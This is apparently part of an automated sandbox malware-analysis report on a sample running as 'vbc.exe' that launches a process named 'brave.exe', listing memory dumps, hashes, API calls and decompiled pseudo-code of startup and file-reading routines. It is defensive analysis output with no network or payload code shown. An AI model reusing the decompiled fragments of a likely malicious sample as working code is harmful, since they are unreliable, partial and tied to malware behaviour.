Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 5f231acb1a45d62ba4e0702e4f180a2416a2ea9ed0ac27f5b8f855e8ec20ffbc
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 2411877680414EBBCF125F84CC01CEE3F62BF18354B59842AFE1865171D33AE972AB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 5440, Parent PID: 5852COMMON

Executed Functions

Function 04C9D820 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd4ac05a0540dbd926187e7ea8ce917df103323bdb649917fa6c8e1dea2ccd2
Instruction ID: 5c777b6ef766c8db806ad72662c752281812d3e4a6bd234bb49da1017ed7655c
Opcode Fuzzy Hash: cfd4ac05a0540dbd926187e7ea8ce917df103323bdb649917fa6c8e1dea2ccd2
Instruction Fuzzy Hash: AB210871600240EFCF05DF54D9C8B16BBA6FB88314F2485B9E9061B606C33AEC56DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 04C9D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b2639f0244e89b3ff3e4c21f702dfb9fcacd70ef9700a85677cf6390872f40
Instruction ID: 24491a3f327e6675802bc13a983afa73a3aa0281b9eff01b8f0d6bfa36d19b34
Opcode Fuzzy Hash: 04b2639f0244e89b3ff3e4c21f702dfb9fcacd70ef9700a85677cf6390872f40
Instruction Fuzzy Hash: A4212BB1600240EFCF51DF14D9C4B16BBA6FB84328F248569E8065B206C336ED56C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04C9D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202efc02f5f51eda9f61fe8038c4b9f9ac3a95660c83a988c158e7a6f91aa8af
Instruction ID: a3343265d21083950b7025ed1eff52cc490a3a1067c1b8deba7478c96408d24d
Opcode Fuzzy Hash: 202efc02f5f51eda9f61fe8038c4b9f9ac3a95660c83a988c158e7a6f91aa8af
Instruction Fuzzy Hash: D0210671600200EFCF05DF14D9C4B26BBA6FB94324F24C979E80A1B606C336F856DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04C9D81B Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb4e2e8a40aaf0fb282dfab72678b798e88fc952913473c578afbbc5fb9f3f0
Instruction ID: ca0b2a5f8bde556b752e6da4c53e02946c1d04b7498a62a6470844f65ed15e81
Opcode Fuzzy Hash: 2eb4e2e8a40aaf0fb282dfab72678b798e88fc952913473c578afbbc5fb9f3f0
Instruction Fuzzy Hash: A521D272504280DFCF06CF10D9C4B16BFB2FB88314F24C6A9D9491B616C33AE966CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04C9D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1193202f6d84514e7bee289ffa5d34f3f61fc8f37f39928f4f0d259a97e51c54
Instruction ID: 1f956a652bb226d4a8171bc660212afa375f8bd0174fb87a15d5c1669b2f14ba
Opcode Fuzzy Hash: 1193202f6d84514e7bee289ffa5d34f3f61fc8f37f39928f4f0d259a97e51c54
Instruction Fuzzy Hash: AE11E6B6504280DFCF11CF10D5C4B16BFB2FB84324F24C6A9D8065B616C33AE95ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04C9D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1193202f6d84514e7bee289ffa5d34f3f61fc8f37f39928f4f0d259a97e51c54
Instruction ID: 46cab07e54e19fb6e7b20c54af059956d3f72828cb7de556407eafaa3bb95966
Opcode Fuzzy Hash: 1193202f6d84514e7bee289ffa5d34f3f61fc8f37f39928f4f0d259a97e51c54
Instruction Fuzzy Hash: 68110876504280DFCF05DF10D5C4B16BFB2FB84324F24C6A9D8095B616C33AE95ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04C9DA65 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bb586ad1f9ef501a205d707db64a6fef2f71ead5c86427ebb8224cb5580140
Instruction ID: 6209f30b212f2896b557250ea0cede274ccc3ea781b2fb4eba203c8cadea0a03
Opcode Fuzzy Hash: d7bb586ad1f9ef501a205d707db64a6fef2f71ead5c86427ebb8224cb5580140
Instruction Fuzzy Hash: CF01F031508384B9DF108F25DD84766BBD8DF91234F08C479DD062B641C778AD55C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 04C9DA64 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.432682933.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4c9d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1b0ddf879368ed0b2dcc63e4bc22a79810f863b4fa3243aee618d2fdb9f794
Instruction ID: 89ce3636508c89ed15c3d2baeeb2d40119e0fd9d611d10cff6b4c019b0a79409
Opcode Fuzzy Hash: 2e1b0ddf879368ed0b2dcc63e4bc22a79810f863b4fa3243aee618d2fdb9f794
Instruction Fuzzy Hash: 0DF06871405284AEEB108E55DC84B62FFD8EB91734F18C45AED095B646C774AD44CAB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: brave.exePID: 5100, Parent PID: 5440COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.9%
Total number of Nodes:	1552
Total number of Limit Nodes:	11

Executed Functions

Function 00007FF652B21770 Relevance: 21.9, APIs: 11, Strings: 1, Instructions: 890
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF652B21799
GetTickCount64.KERNEL32 ref: 00007FF652B217AA

Strings

yAA, xrefs: 00007FF652B21EB1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Count64Tick
String ID: yAA
API String ID: 1927824332-3548342407
Opcode ID: 2716b15704170ab8406ace99aba013735212db72fcc988b24af85e7daf47c6f5
Instruction ID: 8cec349eceba004e211b7d719f5b58df4cc527ed26ba8c7e72b32429c7ce3896
Opcode Fuzzy Hash: 2716b15704170ab8406ace99aba013735212db72fcc988b24af85e7daf47c6f5
Instruction Fuzzy Hash: DD92D361A187C241FB218B25EC157BA67A1FF9678CF485231CE8CA7B96EFADD140C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B23170 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 423
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_stricmp.MSVCRT ref: 00007FF652B23384
strcmp.MSVCRT ref: 00007FF652B2358E
strcmp.MSVCRT ref: 00007FF652B23640
strcmp.MSVCRT ref: 00007FF652B236E7
strcmp.MSVCRT ref: 00007FF652B23797
strcmp.MSVCRT ref: 00007FF652B2383A
strcmp.MSVCRT ref: 00007FF652B238BA

Strings

KF , xrefs: 00007FF652B2385B
}, xrefs: 00007FF652B236FC
y, xrefs: 00007FF652B234E9

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: strcmp$_stricmp
String ID: KF $y$}
API String ID: 3398372305-1747734038
Opcode ID: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction ID: 05c425c5a9386b723a4d91613235bc20700242d2c704640e6ae0ad2e79f884ba
Opcode Fuzzy Hash: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction Fuzzy Hash: 3622A062A18BC186EB25CB29EC453AA77A4FF5678CF488231DA8C97755DFBCD044C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B21190 Relevance: 10.7, APIs: 7, Instructions: 201
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E00007FF67FF652B21190(void* __edi, void* __esp) {
				signed char _v120;
				char _v168;
				_Unknown_base(*)()* _t30;
				void* _t32;
				intOrPtr _t39;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				intOrPtr* _t87;
				long long _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				signed short* _t91;
				signed short* _t92;
				long long _t93;
				intOrPtr* _t95;
				intOrPtr _t97;
				long long* _t104;
				intOrPtr* _t109;
				signed short* _t110;
				signed long long _t111;
				void* _t113;
				signed short* _t114;
				long long _t118;
				signed long long _t122;

				_t111 =  *0x52dd69e0; // 0x7ff652de10e0
				r9d =  *_t111;
				memset(__edi, 0, 0xd << 0);
				if (r9d != 0) goto 0x52b2148b;
				_t97 =  *0x52dd6900; // 0x7ff652de1090
				goto 0x52b211f9;
				if ( *((intOrPtr*)( *[gs:0x30] + 8)) ==  *[gs:0x30]) goto 0x52b21434;
				Sleep(??);
				asm("lock dec eax");
				if (_t113 != 0) goto 0x52b211e8;
				_t109 =  *0x52dd6910; // 0x7ff652de1098
				if ( *_t109 == 1) goto 0x52b2144b;
				if ( *_t109 == 0) goto 0x52b214b4;
				 *0x52de101c = 1;
				if ( *_t109 == 1) goto 0x52b21460;
				if (0 == 0) goto 0x52b21481;
				_t87 =  *0x52dd6870; // 0x7ff652dd5a40
				_t88 =  *_t87;
				if (_t88 == 0) goto 0x52b2125c;
				r8d = 0;
				E00007FF67FF652B2E830( *_t88());
				_t30 = SetUnhandledExceptionFilter(??);
				_t104 =  *0x52dd68f0; // 0x7ff652de1120
				 *_t104 = _t88;
				_t32 = E00007FF67FF652B2E640(E00007FF67FF652B41D80(_t30, 0x7ff652b21000));
				_t89 =  *0x52dd6890; // 0x7ff652b20000
				 *0x52de1010 = _t89;
				E00007FF67FF652B41E70(_t32);
				_t90 =  *_t89;
				if (_t90 != 0) goto 0x52b212c3;
				goto 0x52b21308;
				if (2 == 0) goto 0x52b212dd;
				if (2 == 0) goto 0x52b212dd;
				_t91 = _t90 + 2;
				_t52 =  *_t91 & 0x0000ffff;
				if (_t52 - 0x20 <= 0) goto 0x52b212b0;
				r8d = 1;
				r8d = r8d ^ 0x00000001;
				_t48 =  ==  ? r8d : 1;
				goto 0x52b212bf;
				if (_t52 - 1 - 0x1f > 0) goto 0x52b21301;
				asm("o16 nop [cs:eax+eax]");
				_t92 =  &(_t91[1]);
				if (_t97 - 1 - 0x1f <= 0) goto 0x52b212f0;
				 *0x52de1008 = _t92;
				r8d =  *_t111;
				if (r8d == 0) goto 0x52b21326;
				if ((_v120 & 0x00000001) != 0) goto 0x52b2142a;
				 *0x52b53000 = 0xa;
				_t10 =  *0x52de1038 + 1; // 0x7ffa26c83ca1
				r13d = _t10;
				_t122 = r13d << 3;
				malloc(??);
				_t110 =  *0x52de1030; // 0x1ac127317f0
				_t114 = _t92;
				if (r12d <= 0) goto 0x52b213ab;
				asm("o16 nop [eax+eax]");
				_t93 =  *((intOrPtr*)(_t110 + _t111 * 8));
				if ( *_t93 == 0) goto 0x52b21420;
				r8d = 1;
				if ( *((short*)(_t93 + ( &_v168 + 1) * 2 - 2)) != 0) goto 0x52b21370;
				malloc(??);
				 *((long long*)(_t114 + _t111 * 8)) = _t93;
				memcpy(??, ??, ??);
				if ( *0x52de1038 != _t111 + 1) goto 0x52b21358;
				_t22 = _t122 - 8; // -8
				 *((long long*)(_t114 + _t22)) = 0;
				 *0x52de1030 = _t114; // executed
				E00007FF67FF652B2E430();
				_t95 =  *0x52dd68a0; // 0x7ff652de2708
				_t118 =  *0x52de1028; // 0x1ac12736820
				 *((long long*)( *_t95)) = _t118;
				_t39 = E00007FF67FF652B21770( *_t95);
				_t50 =  *0x52de1020; // 0x0
				 *0x52de1024 = _t39;
				if (_t50 == 0) goto 0x52b214d2;
				_t55 =  *0x52de101c; // 0x0
				if (_t55 == 0) goto 0x52b21499;
				return _t39;
			}

0x7ff652b2119f
0x7ff652b211ad
0x7ff652b211b8
0x7ff652b211be
0x7ff652b211cd
0x7ff652b211e1
0x7ff652b211eb
0x7ff652b211f6
0x7ff652b211fc
0x7ff652b21204
0x7ff652b21206
0x7ff652b21214
0x7ff652b2121e
0x7ff652b21224
0x7ff652b21233
0x7ff652b2123b
0x7ff652b21241
0x7ff652b21248
0x7ff652b2124e
0x7ff652b21250
0x7ff652b2125c
0x7ff652b21268
0x7ff652b2126e
0x7ff652b2127c
0x7ff652b21284
0x7ff652b21289
0x7ff652b21290
0x7ff652b21297
0x7ff652b2129e
0x7ff652b212a4
0x7ff652b212a6
0x7ff652b212b3
0x7ff652b212b8
0x7ff652b212bf
0x7ff652b212c3
0x7ff652b212ca
0x7ff652b212cc
0x7ff652b212cf
0x7ff652b212d7
0x7ff652b212db
0x7ff652b212e4
0x7ff652b212e6
0x7ff652b212f4
0x7ff652b212ff
0x7ff652b21301
0x7ff652b21308
0x7ff652b2130e
0x7ff652b2131a
0x7ff652b21320
0x7ff652b2132d
0x7ff652b2132d
0x7ff652b21335
0x7ff652b2133c
0x7ff652b21341
0x7ff652b21348
0x7ff652b2134e
0x7ff652b21352
0x7ff652b21358
0x7ff652b21360
0x7ff652b21366
0x7ff652b2137b
0x7ff652b21384
0x7ff652b2138c
0x7ff652b2139c
0x7ff652b213a4
0x7ff652b213a6
0x7ff652b213ab
0x7ff652b213b2
0x7ff652b213b9
0x7ff652b213be
0x7ff652b213c5
0x7ff652b213d5
0x7ff652b213df
0x7ff652b213e4
0x7ff652b213ea
0x7ff652b213f2
0x7ff652b213f8
0x7ff652b21400
0x7ff652b21415

APIs

Sleep.KERNEL32 ref: 00007FF652B211F6
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF652B21268
malloc.MSVCRT ref: 00007FF652B2133C
malloc.MSVCRT ref: 00007FF652B21384
memcpy.MSVCRT ref: 00007FF652B2139C
GetStartupInfoW.KERNEL32 ref: 00007FF652B2148E

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
String ID:
API String ID: 772431862-0
Opcode ID: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction ID: 7d9be7074a305b2a5ab1f57c3ae374528b999957e643507c974cd7155d546cd5
Opcode Fuzzy Hash: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction Fuzzy Hash: 9F9189B1E2974681EB209B15EC4077D33A1AF0678CF4C8235DA0DE7396DEBDE8408B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B243C0 Relevance: 4.6, APIs: 3, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00007FF67FF652B243C0(void* __esi, long long __rax, void* __rcx, long* __rdx) {
				long long _v48;
				char _v56;
				long long _v72;
				long long _v80;
				long _v88;
				long long _v96;
				long long _v104;
				long _t10;
				long _t13;
				long long _t22;
				long* _t25;

				_t22 = __rax;
				_t25 = __rdx;
				E00007FF67FF652B239D0(1, __rax, __rcx); // executed
				if (_t22 == 0xffffffff) goto 0x52b24470;
				_v56 = 0;
				_v48 = 0;
				_t10 = GetFileSize(??, ??);
				r13d = _t10;
				 *_t25 = _t10;
				GetProcessHeap();
				r8d = r13d;
				HeapAlloc(??, ??, ??); // executed
				r9d = 0;
				r8d = 0;
				_v72 = 0;
				_t13 =  *_t25;
				_v80 = 0;
				_v88 = _t13;
				_v96 = _t22;
				_v104 =  &_v56;
				E00007FF67FF652B24CEF(); // executed
				E00007FF67FF652B24D0D(); // executed
				if (_t13 < 0) goto 0x52b24488;
				return _t13;
			}

0x7ff652b243c0
0x7ff652b243ca
0x7ff652b243d2
0x7ff652b243de
0x7ff652b243e4
0x7ff652b243f2
0x7ff652b243fb
0x7ff652b24401
0x7ff652b24404
0x7ff652b24406
0x7ff652b2440c
0x7ff652b24414
0x7ff652b2441a
0x7ff652b2441d
0x7ff652b24422
0x7ff652b2442e
0x7ff652b24433
0x7ff652b2443c
0x7ff652b24445
0x7ff652b2444a
0x7ff652b2444f
0x7ff652b24459
0x7ff652b24460
0x7ff652b2446f

APIs

Part of subcall function 00007FF652B239D0: wcslen.MSVCRT ref: 00007FF652B23A58
Part of subcall function 00007FF652B239D0: wcslen.MSVCRT ref: 00007FF652B23AE6

GetFileSize.KERNEL32 ref: 00007FF652B243FB
GetProcessHeap.KERNEL32 ref: 00007FF652B24406
HeapAlloc.KERNEL32 ref: 00007FF652B24414

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Heapwcslen$AllocFileProcessSize
String ID:
API String ID: 3094376029-0
Opcode ID: 573f6b3d23fbca287f8359be03058163197aa1dff85e69532b243d527b8605eb
Instruction ID: f677bb79a513a5d090fc90a8f55906c824ba48b87cfb445ce63fa6a07d7b68be
Opcode Fuzzy Hash: 573f6b3d23fbca287f8359be03058163197aa1dff85e69532b243d527b8605eb
Instruction Fuzzy Hash: E911D336A04B1545EB11EB25BC15B47B290BB85BBCF880331DE5D43B94EFBC9485C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B52490 Relevance: 1.4, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00007FF67FF652B52490() {
				long long _v296;
				void* _t51;
				void* _t53;
				void* _t54;
				int _t56;
				long long* _t65;
				void* _t66;
				void* _t67;
				int _t75;
				void* _t120;
				int _t121;
				int _t122;
				int _t123;
				int _t124;
				int _t125;
				int _t130;

				E00007FF67FF652B519A0(_t53, _t54, _t56, _t67);
				_t121 = _t56;
				E00007FF67FF652B4A110(_t56, _t67);
				E00007FF67FF652B52160(0x10, _t51, _t56, _t66, _t121, 0x52dd6bb0, 0x7ff652b4a230, _t120, _t121, _t67);
				_t128 = _t56;
				E00007FF67FF652B51CF0(_t121);
				E00007FF67FF652B2FEC0();
				_push(_t56);
				_push(_t121);
				E00007FF67FF652B519A0(_t53, _t54, _t56, _t128);
				_t122 = _t56;
				E00007FF67FF652B4A290(_t56, _t128);
				E00007FF67FF652B52160(0x10, _t51, _t56, _t66, _t122, 0x52dd6bd0, 0x7ff652b4a3b0, _t120, _t122, _t128);
				_t130 = _t56;
				E00007FF67FF652B51CF0(_t122);
				_t75 = _t130;
				E00007FF67FF652B2FEC0();
				_push(_t130);
				_push(_t122);
				E00007FF67FF652B519A0(_t53, _t54, _t56, _t75);
				_t123 = _t56;
				E00007FF67FF652B4A7A0(_t56, _t75);
				E00007FF67FF652B52160(0x10, _t51, _t56, _t66, _t123, 0x52dd6c10, 0x7ff652b4a8d0, _t120, _t123, _t75);
				_t132 = _t56;
				E00007FF67FF652B51CF0(_t123);
				E00007FF67FF652B2FEC0();
				_push(_t56);
				_push(_t123);
				E00007FF67FF652B519A0(_t53, _t54, _t56, _t132);
				_t124 = _t56;
				E00007FF67FF652B49850(_t56, _t132);
				E00007FF67FF652B52160(0x10, _t51, _t56, _t66, _t124, 0x52dd6b70, 0x7ff652b49970, _t120, _t124, _t132);
				_t134 = _t56;
				E00007FF67FF652B51CF0(_t124);
				E00007FF67FF652B2FEC0();
				_push(_t56);
				_push(_t124);
				E00007FF67FF652B519A0(_t53, _t54, _t56, _t134);
				_t125 = _t56;
				E00007FF67FF652B4A970(_t56, _t134);
				E00007FF67FF652B52160(0x10, _t51, _t56, _t66, _t125, 0x52dd6c30, 0x7ff652b4aa90, _t120, _t125, _t134);
				_t136 = _t56;
				E00007FF67FF652B51CF0(_t125);
				E00007FF67FF652B2FEC0();
				_push(_t56);
				E00007FF67FF652B519A0(_t53, _t54, _t56, _t136);
				_t126 = _t56;
				E00007FF67FF652B4AAF0(_t56, _t136);
				E00007FF67FF652B52160(0x10, _t51, _t56, _t66, _t56, 0x52dd6c50, 0x7ff652b4ac10, _t120, _t56, _t136);
				E00007FF67FF652B51CF0(_t126);
				E00007FF67FF652B2FEC0();
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				_t65 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF652B30980(0x52dd2d20, 0x52dd6c50);
				 *0x52dd2d38 = 0x12400; // executed
				malloc(_t125); // executed
				 *0x52dd2d30 = _t65;
				if (_t65 == 0) goto 0x52b52789;
				 *0x52dd2d28 = _t65;
				 *_t65 = 0x12400;
				 *((long long*)(_t65 + 8)) = 0;
				goto E00007FF67FF652B21520;
				 *0x52dd2d38 = 0;
				 *0x52dd2d28 = 0;
				goto 0x52b52779;
				0;
				0;
				0;
			}

0x7ff652b524a0
0x7ff652b524ab
0x7ff652b524ae
0x7ff652b524c4
0x7ff652b524c9
0x7ff652b524cf
0x7ff652b524d7
0x7ff652b524e0
0x7ff652b524e2
0x7ff652b524f0
0x7ff652b524fb
0x7ff652b524fe
0x7ff652b52514
0x7ff652b52519
0x7ff652b5251f
0x7ff652b52524
0x7ff652b52527
0x7ff652b52530
0x7ff652b52532
0x7ff652b52540
0x7ff652b5254b
0x7ff652b5254e
0x7ff652b52564
0x7ff652b52569
0x7ff652b5256f
0x7ff652b52577
0x7ff652b52580
0x7ff652b52582
0x7ff652b52590
0x7ff652b5259b
0x7ff652b5259e
0x7ff652b525b4
0x7ff652b525b9
0x7ff652b525bf
0x7ff652b525c7
0x7ff652b525d0
0x7ff652b525d2
0x7ff652b525e0
0x7ff652b525eb
0x7ff652b525ee
0x7ff652b52604
0x7ff652b52609
0x7ff652b5260f
0x7ff652b52617
0x7ff652b52620
0x7ff652b52630
0x7ff652b5263b
0x7ff652b5263e
0x7ff652b52654
0x7ff652b5265f
0x7ff652b52667
0x7ff652b52670
0x7ff652b52681
0x7ff652b52683
0x7ff652b52694
0x7ff652b52696
0x7ff652b526a7
0x7ff652b526a9
0x7ff652b526ba
0x7ff652b526bc
0x7ff652b526c7
0x7ff652b526c9
0x7ff652b526da
0x7ff652b526dc
